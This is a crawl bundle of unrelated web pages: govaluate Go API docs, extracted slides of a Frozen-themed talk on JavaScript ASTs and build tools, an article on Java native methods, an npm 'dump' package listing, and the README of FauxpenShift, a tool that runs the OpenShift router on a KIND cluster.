Returns an error if the given expression has invalid syntax. func NewEvaluableExpressionFromTokens ¶ func NewEvaluableExpressionFromTokens(tokens []ExpressionToken) (*EvaluableExpression, error) Similar to [NewEvaluableExpression], except that instead of a string, an already-tokenized expression is given. This is useful in cases where you may be generating an expression automatically, or using some other parser (e.g., to parse from a query language) func NewEvaluableExpressionWithFunctions ¶ func NewEvaluableExpressionWithFunctions(expression string, functions map[string]ExpressionFunction) (*EvaluableExpression, error) Similar to [NewEvaluableExpression], except enables the use of user-defined functions. Functions passed into this will be available to the expression. func (EvaluableExpression) Eval ¶ added in v1.5.0 func (this EvaluableExpression) Eval(parameters Parameters) (interface{}, error) Runs the entire expression using the given [parameters]. e.g., If the expression contains a reference to the variable "foo", it will be taken from `parameters.Get("foo")`. This function returns errors if the combination of expression and parameters cannot be run, such as if a variable in the expression is not present in [parameters]. In all non-error circumstances, this returns the single value result of the expression and parameters given. e.g., if the expression is "1 + 1", this will return 2.0. e.g., if the expression is "foo + 1" and parameters contains "foo" = 2, this will return 3.0 func (EvaluableExpression) Evaluate ¶ func (this EvaluableExpression) Evaluate(parameters map[string]interface{}) (interface{}, error) Same as `Eval`, but automatically wraps a map of parameters into a `govalute.Parameters` structure. func (EvaluableExpression) String ¶ func (this EvaluableExpression) String() string Returns the original expression used to create this EvaluableExpression. func (EvaluableExpression) ToSQLQuery ¶ added in v1.2.0 func (this EvaluableExpression) ToSQLQuery() (string, error) Returns a string representing this expression as if it were written in SQL. This function assumes that all parameters exist within the same table, and that the table essentially represents a serialized object of some sort (e.g., hibernate). If your data model is more normalized, you may need to consider iterating through each actual token given by `Tokens()` to create your query. Boolean values are considered to be "1" for true, "0" for false. Times are formatted according to this.QueryDateFormat. func (EvaluableExpression) Tokens ¶ func (this EvaluableExpression) Tokens() []ExpressionToken Returns an array representing the ExpressionTokens that make up this expression. func (EvaluableExpression) Vars ¶ func (this EvaluableExpression) Vars() []string Returns an array representing the variables contained in this EvaluableExpression. type ExpressionFunction ¶ Represents a function that can be called from within an expression. This method must return an error if, for any reason, it is unable to produce exactly one unambiguous result. An error returned will halt execution of the expression. type ExpressionToken ¶ Represents a single parsed token. type MapParameters ¶ added in v1.5.0 func (MapParameters) Get ¶ added in v1.5.0 func (p MapParameters) Get(name string) (interface{}, error) type OperatorSymbol ¶ Represents the valid symbols for operators. 
const ( VALUE OperatorSymbol = iota LITERAL NOOP EQ NEQ GT LT GTE LTE REQ NREQ IN AND OR PLUS MINUS BITWISE_AND BITWISE_OR BITWISE_XOR BITWISE_LSHIFT BITWISE_RSHIFT MULTIPLY DIVIDE MODULUS EXPONENT NEGATE INVERT BITWISE_NOT TERNARY_TRUE TERNARY_FALSE COALESCE FUNCTIONAL SEPARATE ) func (OperatorSymbol) IsModifierType ¶ added in v1.4.0 func (this OperatorSymbol) IsModifierType(candidate []OperatorSymbol) bool Returns true if this operator is contained by the given array of candidate symbols. False otherwise. func (OperatorSymbol) String ¶ func (this OperatorSymbol) String() string Generally used when formatting type check errors. We could store the stringified symbol somewhere else and not require a duplicated codeblock to translate OperatorSymbol to string, but that would require more memory, and another field somewhere. Adding operators is rare enough that we just stringify it here instead. type Parameters ¶ added in v1.5.0 type Parameters interface { /* Get gets the parameter of the given name, or an error if the parameter is unavailable. Failure to find the given parameter should be indicated by returning an error. */ Get(name string) (interface{}, error) } Parameters is a collection of named parameters that can be used by an EvaluableExpression to retrieve parameters when an expression tries to use them. type TokenKind ¶ Represents all valid types of tokens that a token can be.
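Since Parameters is a one-method interface, a custom implementation can resolve variables from anywhere, not just a map. A minimal sketch (the type, its behaviour and the expression are invented for illustration):

package main

import (
	"fmt"
	"strings"

	"github.com/Knetic/govaluate"
)

// envParameters resolves expression variables from a plain map of strings,
// upper-casing the name first. Purely illustrative.
type envParameters map[string]string

func (p envParameters) Get(name string) (interface{}, error) {
	value, ok := p[strings.ToUpper(name)]
	if !ok {
		return nil, fmt.Errorf("no parameter named %q", name)
	}
	return value, nil
}

func main() {
	expression, err := govaluate.NewEvaluableExpression("region == 'us-east-1'")
	if err != nil {
		panic(err)
	}

	result, err := expression.Eval(envParameters{"REGION": "us-east-1"})
	fmt.Println(result, err) // true <nil>
}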
https://pkg.go.dev/github.com/Knetic/govaluate
CC-MAIN-2022-05
en
refinedweb
Do You Want to Build a Build Tool? Do You Want to Build a Build Tool? Hi Everyone, I'm Craig ! Hi Everyone, I'm Craig ! - twitter/phenomnominal - github/phenomnomnominal @phenomnominal 2020 Today, I'm going to tell you a fairy tale! Today, I'm going to tell you a Fairy Tale! @phenomnominal 2020 Ready? Ready? @phenomnominal 2020 It was Summer in the Kingdom of Arendelle! It was Summer in the Kingdom of Arendelle! @phenomnominal 2020 And Princess Anna was So Excited! And Princess Anna was So Excited! @phenomnominal 2020 The day had finally arrived! The day had finally arrived! @phenomnominal 2020 Queen Elsa, Anna's sister and Best friend Queen Elsa, Anna's sister and Best friend @phenomnominal 2020 Had finally agreed to share her secrets! Had finally agreed to share her secrets! @phenomnominal 2020 Anna, and her friends Kristoff, Sven and Olaf Anna, and her friends Kristoff, Sven and Olaf @phenomnominal 2020 Had been working hard all winter Had been working hard all winter @phenomnominal 2020 And now it was time for their reward! And now it was time for their reward! @phenomnominal 2020 Elsa has Amazing powers! Elsa has Amazing powers! @phenomnominal 2020 She can sense the water molecules around us, She can sense the water molecules around us, @phenomnominal 2020 transform those water molecules into ice, transform those water molecules into ice, @phenomnominal 2020 And control that ice however she likes! And control that ice however she likes! @phenomnominal 2020 today, Elsa IS going to share her magic! today, Elsa is going to share her magic! @phenomnominal 2020 Chapter One Chapter One Just like magic Just like magic "Anna, do you remember when we went on our trip into the internet?", asked Elsa. @phenomnominal 2020 "Of course!", "We met all the other princesses, it was so much fun!" replied Anna. @phenomnominal 2020 "There was that cute, new little princess, Vanellope!" @phenomnominal 2020 "And her friend Ralph was in trouble!" @phenomnominal 2020 "And we helped save him!" @phenomnominal 2020 "That's right! It was such a fun trip!" "What else do you remember about the internet?" @phenomnominal 2020 "There was so much to do, so much to see!", "So much data flying around! l learned all about how to make websites!" exclaimed Anna. " l loved it so much l even taught Sven when l got back!" @phenomnominal 2020 *SLURP! * , Sven confirmed. @phenomnominal 2020 "l learned to write HTML, and CSS, and JavaScript! "lt was just like magic!" @phenomnominal 2020 It was just like magic @phenomnominal 2020 Chapter Two Chapter Two Sufficiently incredible Sufficiently incredible Anna, Kristoff, Olaf, and Sven waited patiently for Elsa to continue. @phenomnominal 2020 "I'm going to let you in on my little secret", Elsa began. @phenomnominal 2020 "You may have heard that any sufficiently advanced technology is indistinguishable from magic," "but actually, its the other way around..." @phenomnominal 2020 "Any sufficiently incredible magic, is usually actually technology!" @phenomnominal 2020 "Wow! That's amazing! I think?" Kristoff was already blown away by this. @phenomnominal 2020 "I'm just getting started!" "To begin, we need to talk about data..." said Elsa, with a grin. @phenomnominal 2020 "The whole internet is full of data." "Memes" "Infographics" @phenomnominal 2020 {" @phenomnominal 2020 > @phenomnominal 2020 " @phenomnominal 2020 "Olaf, what exactly do you imagine when you think about snow?" @phenomnominal 2020 "I think about skiing, and sledding, and snow fights!" 
"It's so bright, and so cold, and so hard, but also so soft!" "What do you think about Elsa?", he asked. @phenomnominal 2020 "I think about all those things too!" "But my powers allow me to see another level deeper as well..." "Going outside in the cold, having fun with our friends, ice skating..." @phenomnominal 2020 "I see the whole system." "In that system, each water molecule is a little bit of data, following the set of instructions that nature gave it." @phenomnominal 2020 "Those instructions tell the water molecules when to freeze. " "Those instructions tell the molecules which way to go when the wind blows." "I know how to control those instructions." @phenomnominal 2020 "l've worked it out!", "You can understand the snow's source code!" Anna announced suddenly. @phenomnominal 2020 "Exactly!", Esla grinned again. "And do you want to know the best bit?" @phenomnominal 2020 "The code that contains the instructions for all the snow in the world is written in JavaScript!" "I can show you how to query code, modify code, and even create code from nothing!!" "What do you think?" @phenomnominal 2020 Chapter Three Chapter THREE The Snow Code The Snow Code Olaf was so excited that he could barely stop himself from bursting into song! @phenomnominal 2020 "Will you teach us to use the snow code, Elsa?" "Please, please, please, please, PLEASE!" , he pleaded. @phenomnominal 2020 "Of course I will!" , Elsa reassured him. @phenomnominal 2020 "But first, I need to teach you a few tricks!" @phenomnominal 2020 "My gifts let me access the snow code directly!" "You will need to use a slightly more direct approach..." "Kristoff, have you heard of node.js?" @phenomnominal 2020 "Yes!" Kristoff looked pretty proud of himself. "Anna taught me all about it." @phenomnominal 2020 "Node.js is a computer program that lets us run JavaScript without a browser!" @phenomnominal 2020 "We can use it to do things like read and write files, find out stuff about the system, and manipulate data in lots of different ways!" @phenomnominal 2020 "Exactly right! Let's start by looking at how we can read and write files using node.js" @phenomnominal 2020 @phenomnominal 2020 File System APIs File System APIs The most important functions for us to learn today are: fs.writeFile fs.mkdir fs.readFile - - read a file from a path - - make a directory at a path - - write a file to a path @phenomnominal 2020 File System APIs File System APIs // snowflake.txt () /\ //\\ << >> () \\// () ()._____ /\ \\ /\ _____.() \.--.\ //\\ //\\ //\\ /.--./ \\__\\/__\//__\//__\\/__// '--/\\--//\--//\--/\\--' \\\\///\\//\\\//// ()-= >>\\< <\\> >\\<< =-() ////\\\//\\///\\\\ .--\\/--\//--/\\--/\\--. //""/\\""//\""//\""//\""\\ /'--'/ \\// \\// \\// \'--'\ ()`"""` \/ // \/ `"""`() () //\\ () << >> \\// \/ () Imagine that we have a file like this: @phenomnominal 2020: @phenomnominal 2020 File System APIs File System APIs Which will give us something like this: Weaseltown:dywbabt queenelsa$ node index.js () /\ //\\ << >> () \\// () ()._____ /\ \\ /\ _____.() \.--.\ //\\ //\\ //\\ /.--./ \\__\\/__\//__\//__\\/__// '--/\\--//\--//\--/\\--' \\\\///\\//\\\//// ()-= >>\\< <\\> >\\<< =-() ////\\\//\\///\\\\ .--\\/--\//--/\\--/\\--. 
//""/\\""//\""//\""//\""\\ /'--'/ \\// \\// \\// \'--'\ ()`"""` \/ // \/ `"""`() () //\\ () << >> \\// \/ () @phenomnominal 2020: @phenomnominal 2020 Path APIs Path APIs It is also important to understand how the path API works: path.resolve - - resolve a path relative to the given path - - split a path string into its constituent parts path.parse @phenomnominal 2020 () { const relativePath = path.resolve(__dirname, './snowflake.txt'); const relativePath = path.resolve(process.cwd(), './snowflake.txt'); return fs.readFile(relativePath, 'utf8'); } @phenomnominal 2020 , Sven snorted. *snort* @phenomnominal 2020 "That's right Sven! You must always test your file structure & path operations on all the different operating systems you care about! It's very easy to get it wrong!" @phenomnominal 2020 "Now, we've seen how we can read a plain text file, what about something a bit different..." @phenomnominal 2020 @phenomnominal 2020 "Wow! So we took some data that was in a file, and parsed it into JavaScript objects that we can manipulate with code!" Anna was really excited! @phenomnominal 2020 "If you think that is cool, check this out..." Elsa was just getting started! @phenomnominal 2020 "If you think that is cool, check this out..." const SNOW_CODE_PATH = path.resolve( __dirname, './elsa', process.env.SECRET_SNOW_FILE ); Elsa was just getting started! @phenomnominal 2020 "THE PATH TO THE SNOW CODE!" Olaf instantly knew what it was! const SNOW_CODE_PATH = path.resolve( __dirname, './elsa', process.env.SECRET_SNOW_FILE ); @phenomnominal 2020 "Yes! The snow code is just another file!" "It's just text and we can manipulate it and control it!" @phenomnominal 2020 import { promises as fs } from 'fs'; export async function readSnowCode () { return fs.readFile(SNOW_CODE_PATH, 'utf8'); } console.log(await readSnowCode()); Code as data Code as data We don't need to treat a code file any differently: @phenomnominal 2020 @phenomnominal 2020 "Now we have the snow code as a string, so we can change it however we want!" "This is amazing!" Kristoff chimed in: @phenomnominal 2020 //. @phenomnominal 2020 //_138<< , replied Olaf @phenomnominal 2020 //_140<< Even Sven had his own ideas... @phenomnominal 2020 "Hold on everyone, l think we're getting ahead of ourselves!" "Anna, can you think of any reasons why working with the string directly might not be the best approach?" @phenomnominal 2020 "Strings aren't exactly structured!" "You're just changing a bunch of characters, and that could break easily!" "Regular Expressions are hard to get right, and hard to understand later!" "You have to fight with comments, and whitespace!" @phenomnominal 2020 "So how can we get the snow code into a more useful structure?" @phenomnominal 2020: @phenomnominal 2020 import { parseScript } from 'esprima'; import { readSnowCode } from './read-snow-code'; const code = await readSnowCode(); const ast = parseScript(code); console.log(ast); Parsing Parsing We also need to parse our string of code! @phenomnominal 2020 "An ast, I LOVE IT!" "What is an ast?" @phenomnominal 2020 "Good try Olaf..." "It's actually an A S T " "It's an Abstract Syntax Tree..." @phenomnominal 2020 Chapter Four Chapter Four The root of all problems The root of all problems "Oh yeah of course, I know all about those kinds of trees..." "But I think Sven needs a bit of a refresher..." Kristoff sounded uncertain. @phenomnominal 2020 "Sure! Let's start with a literal meaning." 
@phenomnominal 2020 Abstract Syntax Trees Tree data structure made up of vertices and edges without any cycles SYNTAX the way in which linguistic elements are put together Abstract Not associated with any specific instance Abstract Syntax Trees @phenomnominal 2020 ???? ???? ???? ???? ???? ???? ???? ???? ???? @phenomnominal 2020 2020 { type: 'Program', body: [{ type: 'VariableDeclaration', declarations: [{ type: 'VariableDeclarator', id: { type: 'Identifier', name: 'it' }, init: { type: 'CallExpression', callee: { type: 'Identifier', name: 'go' }, arguments: [{ type: Literal', value: 'let it go' }] } }], kind: 'let' }] } @phenomnominal 2020 'let it go' Literal Identifier CallExpression Identifier VariableDeclarator VariableDeclaration go go('let it go') it it = go('let it go') let it = go('let it go'); @phenomnominal 2020 @phenomnominal 2020 "AST Explorer lets you look at the parser output for a huge number of languages!" "It is very useful for seeing the structure of the tree and what properties are present!" AST Explorer AST Explorer @phenomnominal 2020 @phenomnominal 2020 2020 "So Anna, what do you think? Is this better than the string version?" @phenomnominal 2020 "l think so!" "We have a real structure now with the AST" "We access data exactly like we would with JSON, so it's easier to understand" "We don't have to think about comments, or whitespace, we just access what we want to!" @phenomnominal 2020 "lt's still kind of clunky though..." "Do you think we can do better?", "And it will throw an error if the structure doesn't line up with the code!" Elsa asked. ..." @phenomnominal 2020 "Olaf, what do you think this data structure represents?" " }] } @phenomnominal 2020 "IT LOOKS LIKE HTML!" @phenomnominal 2020 "That's an approximation of what the browser creates when it downloads an HTML file and parses it!" "Very good!" "We call it the Document Object Model, or the DOM." "It is also a tree!" @phenomnominal 2020 "Now, wouldn't it be strange if we queried the DOM like this?" import { parse } from './parse-html'; const HTML = ` <h3>...</h3> ... `; const dom = parse(HTML); const node = dom.children[1].children[3].children[0]; console.log(node); @phenomnominal 2020 "It's much more likely that we would do something like this:" const dom = parse(HTML); const node = $(dom, 'body > h3 > span:last-child'); console.log(node); "CSS selectors are a very powerful way to navigate a tree!" @phenomnominal 2020 "So why don't we just use CSS selectors with the JavaScript AST?" "Does JavaScript let us do that?" @phenomnominal 2020 "Unfortunately no, not out of the box..." "Fortunately, there's a huge JavaScript open-source community, and some wonderful people made it so we can do this! @phenomnominal 2020 @phenomnominal 2020 @phenomnominal 2020 "Woooow" Olaf was impressed @phenomnominal 2020 "I get it! These tools are amazing!" "We can find out if a file has an identifier with a certain name!" "Or all the names of all the exported functions!" "Or if it matches some syntactical pattern!" @phenomnominal 2020 "Like a lint rule!?" "Yes! AST queries are *perfect* for writing lint rules!" @phenomnominal 2020 !`); } @phenomnominal 2020 "But wait. What do these queries have to do with the snow code?" @phenomnominal 2020 "In order to change how the snow code works, we need to be able to add our code in the right place!" "This is where the real magic begins..." @phenomnominal 2020 Chapter Five Chapter Five Real Magic Real Magic "My magic works by changing how physics works in real-time." 
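The extracted slides above lean on a "CSS selectors for the AST" library without its name surviving in the text; esquery is one commonly used option, so the following is only a hedged sketch of the idea, with an illustrative selector rather than anything from the talk.

import { parseScript } from 'esprima';
import esquery from 'esquery';

const ast = parseScript(`let it = go('let it go');`);

// CSS-like selector over the AST: every call whose callee is the identifier "go"
const calls = esquery(ast, 'CallExpression[callee.name="go"]');

console.log(calls.length);                 // 1
console.log(calls[0].arguments[0].value);  // 'let it go'

Queries like this are what make the lint-rule use case mentioned above practical: the rule only has to describe the shape of the code it cares about, not walk the whole tree by hand.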
"Let's look at the snow code again..." @phenomnominal 2020!" @phenomnominal 2020" @phenomnominal 2020?" @phenomnominal 2020 "We didn't create the "doMagic" function yet!" "I think that it should freeze all the molecules!" @phenomnominal 2020 "That's right! And what a great idea!" "Generating code is pretty verbose when you manually create AST tokens..." @phenomnominal 2020 //..." @phenomnominal 2020 "Yeeesh" "You bet we can! We've one last trick up our sleeves!" "We can do better than that can't we Elsa?" @phenomnominal 2020 ?" @phenomnominal 2020 !" @phenomnominal 2020 "That'd be pretty amazing! Does something like that exist for JavaScript?" *clip clop* @phenomnominal 2020 "It sure does!" @phenomnominal 2020 @phenomnominal 2020 @phenomnominal 2020 "That is SO MUCH BETTER!!" @phenomnominal 2020 "It sure is!" "We have much less code to maintain!" "Doing AST-based templating like this also makes it much easier to transplant and clone parts of the tree around! @phenomnominal 2020 "Now all we need to do is convert the AST back into text!" @phenomnominal 2020 "For that, we get to use one more open-source library!" @phenomnominal 2020 @phenomnominal 2020 "Now everyone, we're ready to put all the bits together!" "I'm going to need all your help!" @phenomnominal 2020?" @phenomnominal 2020 !" @phenomnominal 2020 "That was a lot of information" @phenomnominal 2020 "These ideas are the foundation of all tools that help build the internet!" "From Webpack to ESLint, from Sass to Create React App" "And now we can make our own!!" @phenomnominal 2020 "Remember you can use these ideas to modify any source code in any programming language!" @phenomnominal 2020 "Elsa, thank you so much for showing us your magic!" , said "Sven". @phenomnominal 2020 @phenomnominal 2020 "Don't you mean 'technology'?" Everyone laughed, and they started heading back towards Arendelle. , said Anna. The End The End Okay, Bye Okay, Bye - twitter/phenomnominal - github/phenomnomnominal Do You Want to Build a Build Tool? By Craig Spence
https://slides.com/craigspence/do-you-want-to-build-a-build-tool-yglf
CC-MAIN-2022-05
en
refinedweb
1. What is a Native Method?
Simply put, a native method is a Java interface for calling non-Java code: a Java method whose implementation is supplied in another language, such as C. This feature is not unique to Java; many other programming languages have a similar mechanism. In C++, for example, you can use extern "C" to tell the C++ compiler to call a C function. "A native method is a Java method whose implementation is provided by non-java code."
When you declare a native method you do not provide a body (much like declaring a method in a Java interface), because the implementation is supplied outside of Java. An example:
public class IHaveNatives {
    native public void Native1( int x ) ;
    native static public long Native2() ;
    native synchronized private float Native3( Object o ) ;
    native void Native4( int[] ary ) throws Exception ;
}
These declarations describe what the non-Java code looks like from the Java side (its view). The identifier native can be combined with every other Java method modifier except abstract. That is reasonable: native implies that the method does have an implementation, just not one written in Java, while abstract states explicitly that the method has no implementation. Combined with other modifiers, native does not change their meaning; native static, for instance, means the method can be called without creating an instance of the class, which is convenient when the native method wraps a C library. The third method above uses native synchronized: the JVM acquires the synchronization lock before entering the method body, exactly as it does for Java-level multithreading.
A native method can return any Java type, including non-primitive types, and it can take part in exception handling: the implementation can create an exception and throw it, much like a Java method. When a native method receives a non-primitive argument such as an Object or an integer array, it can access the internals of that object, but doing so makes the native method depend on the implementation of the Java class. One thing to keep in mind: a native method can reach every Java feature, but that access depends on how the feature is implemented and is nowhere near as convenient or easy as using the feature from the Java language itself.
The existence of native methods has no effect on the classes that call them; in fact, a caller does not even know that it is invoking a native method. The JVM handles all the details of the call. Note also what happens when a native method is declared final. A method implemented in Java may gain efficiency from inlining when it is compiled; whether a native final method gets the same benefit is doubtful, but that is only a code-optimization question and has no impact on functionality.
If a class containing native methods is inherited, the subclass inherits the native method and can override it in Java (which may look strange); likewise, if a native method is marked final, it cannot be overridden in a subclass. Native methods are very useful because they effectively extend the JVM. In fact, the Java code we write already relies on them: in Sun's implementation of the Java concurrency (multithreading) mechanism, many of the points of contact with the operating system are native methods. This lets Java programs cross the boundary of the Java runtime; with native methods, a Java program can perform tasks at any level of the system.
2. Why use Native Methods?
Java is very convenient to use, but some kinds of tasks are not easy to implement in Java, and sometimes we care about the efficiency of the program; that is where the problems start. Java applications also need to interact with the environment outside of Java, and this is the main reason native methods exist. Think of the situations where Java needs to exchange information with an underlying system such as the operating system or some piece of hardware. A native method is exactly such a communication mechanism: it gives us a very simple interface, and we do not have to understand the tedious details beyond the Java application.
Interaction with the operating system: the JVM supports the Java language itself and the runtime library; it is the platform on which Java programs live, with an interpreter (for bytecode) and libraries linked to native code. Even so, it is not a complete system by itself; it often depends on the support of the underlying system, and that underlying system is usually a powerful operating system. By using native methods, the JRE's interaction with the underlying system can be implemented; even parts of the JVM are written in C. Also, if we want to use an operating-system feature that the Java language itself does not wrap, we need native methods.
Sun's Java: Sun's interpreter is implemented in C, which lets it interact with the outside world like an ordinary C program. The JRE is mostly implemented in Java, and it too interacts with the outside world through native methods. For example, the setPriority() method of class java.lang.Thread is implemented in Java, but it calls the native method setPriority0() in the same class. That native method is implemented in C and embedded inside the JVM; on the Windows 95 platform it ultimately calls the Win32 SetPriority() API. This particular native method is supplied directly by the JVM; more often, native methods are provided by an external dynamic link library (DLL) and then called by the JVM.
3. How the JVM runs a Native Method
When a class is used for the first time, its bytecode is loaded into memory, and it is loaded only once. At the entry of the loaded bytecode a list of method descriptors is maintained; these descriptors contain information such as where the method's code lives, what parameters it takes, its modifiers (public and so on), and so forth. If a method descriptor contains native, the descriptor block also holds a pointer to the implementation of the method.
Those implementations live in DLL files, which the operating system loads into the address space of the Java program. When a class with native methods is loaded, its associated DLL is not loaded yet, so the pointer to the method implementation is not set. The DLL is loaded before the native method is first called, which is done by calling System.loadLibrary(). The last thing to know is that native methods come with a cost: you lose many of the benefits of Java, so use them only when there is no other choice.
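To make the mechanics above concrete, here is a minimal, hedged sketch of the Java side: a class that declares a native method and loads its library from a static initializer. The library name "hello" and the method are illustrative, not taken from the article; the matching C implementation would be compiled separately into hello.dll or libhello.so.

public class HelloNative {
    // Load hello.dll / libhello.so once, when the class is initialized.
    static {
        System.loadLibrary("hello");
    }

    // Declared in Java, implemented in C through JNI.
    public static native String greet(String name);

    public static void main(String[] args) {
        // The caller cannot tell that this is a native call.
        System.out.println(greet("world"));
    }
}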
https://chenhaoxiang.cn/2021/06/20210604170500513P.html
CC-MAIN-2022-05
en
refinedweb
277 packages found Stringify an object/array like JSON.stringify just without all the double-quotes A string manipulation toolbox, featuring a string formatter (inspired by sprintf), a variable inspector (output featuring ANSI colors and HTML) and various escape functions (shell argument, regexp, html, etc). import and export tools for elasticsearch - elasticsearch - dump - elasticdump - import - export - transfer - migrate - migration - elasitic - cluster - elastic-dump - elastic dump Handlebars utility helper to output a navigable, visual representation of data Stream SQL dump to newline delimited json Dump Mysql, Postgres, SQLServer, and ElasticSearch databases directly to AWS S3, Google Cloud Storage, or Azure. Convert an object or array into a formatted string A nodejs package to quickly dumb DB to file. Supports Mysql, PostgreSQL, MongoDB and SQLite A Node function to connect into MongoDB, get documents from collection by name and save the content to CSV file. Store your sensitive informations in .env or inject from pipeline are good pratices and this way i did. ### Install ```sh npm i mongo-dump-col A Promise-based client for the 'Have I been pwned?' service. A better and pretty variable inspector for your Node.js applications. putout formatter stores output and dump it on end Get all the values from a contract in the blockchain, optionally transformed as desired Dump records from mongo to elastic httpdumper is a library that will help you debugging your http request. PouchDB Load - load dumped CouchDB/PouchDB databases on the client Dumps all values and/or keys of a level db or a sublevel to the console. Export a PostgreSQL schema as JSON A nodejs package to quickly dumb DB to file. Supports Mysql, PostgreSQL, MongoDB and SQLite
https://www.npmjs.com/search?q=keywords:dump
CC-MAIN-2022-05
en
refinedweb
Below you can find a list of tasks that are not worth putting in a bug tracker. Mostly because they involve some refactoring, or because they would cause so many changes we are not sure if/when we will tackle them. Feel free to add your own ideas here. CMake ¶ qi_stage_lib/qi_use_lib ¶ - Handle package versions? - Use new CMake 2.8.11 features - avoid using the cache for global variables and use global properties instead Use a build ‘prefix’ ¶ qibuild does lots of black magic so that you can find dependencies and headers paths from the sources and build dir of your project, without using the “global cmake registry” or any other tricks. However: - this means you can have problems with your headers install rules and not see them - this also means you cannot easily depend of a project not using qibuild (even if it uses CMake), or a project using autotools The solution is simple: After building a dependency, install it to QI_WOKTREE/root and just set CMAKE_INSTALL_PREFIX to QI_WOKTREE/root This will work with any build system, (provided they have correct install rules), and will force people to have correct install rules. Make it easier to use 3rd party cmake module ¶ Say you find a foo-config.cmake somewhere... If you try to do find_package(FOO) qi_create_bin(bar) qi_use_lib(bar FOO) This may or may not work: it depends of what the foo-config.cmake does: qi_use_lib , qi_stage_lib expects some variables ( FOO_INCLUDE_DIRS , FOO_LIBRARIES ) to be in the cache It may be cleaner to add a qi_export function find_package(FOO) # works out of the box if foo follows CMake conventions qi_export(foo) # can specify alternative variable names (here the case is wrong) qi_export(foo LIBRARIES ${Foo_LIBRARY} ) Make it easier to stage and use header-only libraries ¶ Basically, go from find_package(EIGEN3) include_directories(${EIGEN3_INCLUDE_DIRS}) include_directories("include") qi_stage_header_only_lib(foo DEPENDS EIGEN3) To qi_create_header_only_lib(foo ${public_headers}) qi_use_lib(foo EIGEN3) qi_stage_lib(foo) where foo is a header-only library depending on Eigen3 Command line ¶ - add group for every action parser, or only display the options specific to the given action when using qibuild <action> –help - add a “path” type in argparse so that (on Windows at least) we: - always convert to lower case - check for forbidden characters - make output more consistent (use the same color for the same thing everywhere for starters), this probably means extending the qisys.uiAPI - make qisrc initworks with a local directory containing a worktree (maybe qisrc clone). but init seems better. “Are you a manifest git repo? No? So clone all.” - make git dependency optional qibuild ¶ qibuild configshould list the available build profiles - fix linker problems when using toolchain and third party libraries on mac - fix Xcode support and other “multi-configuration” IDE by having two SDK_DIRS(one debug, one release) in the same build directory - handle custom build directory - qibuild deploy: fix gdb configuration files generation - add qibuild find -zto look in every build directory - Better integration with QtCreator: - Write our own plugin to avoid the “CMakeList” pop-up (it only re-runs CMake to generate an XML code-blocks file, that is then re-parsed by QtCreator) - Match qitoolchain configurations with QtCreator’s kits - Automatically configure tests when they take arguments qisrc ¶ - mirroring qisrc manifests. (Same repos, same review, but an other “base URL”) - use --depthoption when cloning. 
May speed up the initial clone Python ¶ Port to Python3 ¶ It’s the future ! We already removed compatibility with Python 2.6 , and python3 is now the default version on most linux distros. Renames ¶ - XMLParser.xml_elem() -> dump() - XMLParser._write_foo() -> _dump_foo() - rewrite qibuild.config using XMLParser - rename qibuild.config -> qibuild.xml_config? - choose between destdir and dest_dir - qisrc.status.check_state(project, untracked) -> qisrc.status.check_state(project, untracked=False) - what we call “zombies” in the implementation of qibuild testare actually orphans (see ), so we should fix the code accordingly. Plus this means we can write a kill_orphansmethod :) tests ¶ - Document pytestfixtures: we have tons of them, and some of them are very magic - Replace qibuild_action(“configure”) with a nicer syntax: - qibuild_action.call(“configure”)? - qibuild_action.configure(”...”)? - fix running automatic tests on mac misc ¶ parser.get_* functions should be usable with **kwargstoo: def get_worktree(args=None, **kwargs): options = dict() if args: options = vars(args[0]) else: options = kwargs qisrc.parser.get_projects(worktree, args)-> qisrc.parser.get_projects(args)(just get the worktree from the args) replace qisys.interact.ask_choiceInstead of a return_intoption, use something like: ask_choice(message, choices, display_fun=None, allow_none=False) display_funwill be called on each choice to display them to the user, returning either an element from the choices list, or None if the user did not enter anything and allow_noneis True Use same API as shutilin qisys.shand qisys.archive: - qisys.command.find -> qisys.command.which - qisys.command.archive ->
https://developer.softbankrobotics.com/hacking-qibuild/contributing-qibuild/qibuild-todo
CC-MAIN-2022-05
en
refinedweb
FauxpenShift This cli utility creates a Kubernetes cluster using KIND (KIND runs Kubernetes in a containers) and installs the OpenShift Router on top of it. This is useful for when you want to test your applications using OpenShift routes, but CRC is too heavy. Prerequisites At a minimum - Docker or Podman (podman is experimental) - Access to Nip.io While you don’t need the kind CLI, you do need to satisfy all the prereqs for KIND. If you’re having trouble see their official docs. Running it Download the CLI from and put it in your path. Linux sudo wget -O /usr/local/bin/fauxpenshift Mac OS (Intel) sudo wget -O /usr/local/bin/fauxpenshift Make it executable sudo chmod +x /usr/local/bin/fauxpenshift Bash completion if you wish source <(fauxpenshift completion bash) Create a Kubernetes cluster with an OpenShift Router: fauxpenshift create NOTE To use Podman run: sudo KIND_EXPERIMENTAL_PROVIDER=podman fauxpenshift create You should have a Kubernetes Cluster with the router running NOTE If using Podman, you must extract the kubeconfig config by runnning: sudo fauxpenshift kubeconfig oc get pods -n openshift-ingress Testing It Now let’s create an app and expose a route. First create a namespace oc create ns welcome-app Create a deployment in this namespace oc create deployment welcome-php \ --image=quay.io/redhatworkshops/welcome-php:latest -n welcome-app Create a service for this deployment oc expose deployment welcome-php --port=8080 --target-port=8080 -n welcome-app Now create a route oc expose svc/welcome-php -n welcome-app Patch things that the oc expose didn’t 100% get you. NOTE: You only need to do this if you’re doing this from scratch. If you have a “known good” YAML for your application it should “just work” kubectl patch route welcome-php -n welcome-app --type=json -p='[{"op": "add", "path": "/spec/to/kind", "value":"Service"}]' kubectl patch route welcome-php -n welcome-app --type=json -p='[{"op": "add", "path": "/spec/wildcardPolicy", "value":"Subdomain"}]' Get your route oc get route -n welcome-app Curl it (or open it up in a browser) curl -sI get route welcome-php -n welcome-app -o jsonpath='{.status.ingress[0].host}') Clean Up Delete your cluster fauxpenshift destroy NOTE If using Podman, run: sudo KIND_EXPERIMENTAL_PROVIDER=podman fauxpenshift destroy
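The note above says a "known good" YAML avoids the two kubectl patch commands; for reference, a Route manifest for the welcome-php example might look roughly like the sketch below. This is hedged: the host field is optional and the nip.io value shown is only an illustration of the pattern the README relies on.

apiVersion: route.openshift.io/v1
kind: Route
metadata:
  name: welcome-php
  namespace: welcome-app
spec:
  # host: welcome-php-welcome-app.127.0.0.1.nip.io   # illustrative only
  to:
    kind: Service
    name: welcome-php
  port:
    targetPort: 8080
  wildcardPolicy: Subdomain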
https://golangexample.com/fauxpenshift-a-kubernetes-cluster-the-openshift-router/
CC-MAIN-2022-21
en
refinedweb
